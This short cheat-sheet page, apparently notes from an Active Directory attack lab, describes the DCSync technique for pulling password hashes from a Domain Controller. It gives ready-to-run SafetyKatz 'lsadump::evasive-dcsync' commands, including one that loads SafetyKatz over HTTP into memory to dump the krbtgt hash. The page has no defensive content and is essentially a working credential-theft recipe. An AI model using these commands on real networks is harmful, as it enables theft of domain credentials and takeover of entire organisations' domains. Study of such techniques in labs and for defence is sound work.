Skip to content

DCSYNC

A technique that mimics a Domain Controller using the MS-DRSR protocol to request password data (hashes) over the network. It avoids touching the ntds.dit file on disk.

Requirements: You must have Domain Admin privileges (or specific replication rights: Get-Changes and Get-Changes-All) to authorize the replication request.

SafetyKatz.exe -args "lsadump::evasive-dcsync /user:dcorp\<USER>"
# with loader
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "lsadump::evasive-dcsync /user:dcorp\krbtgt" "exit"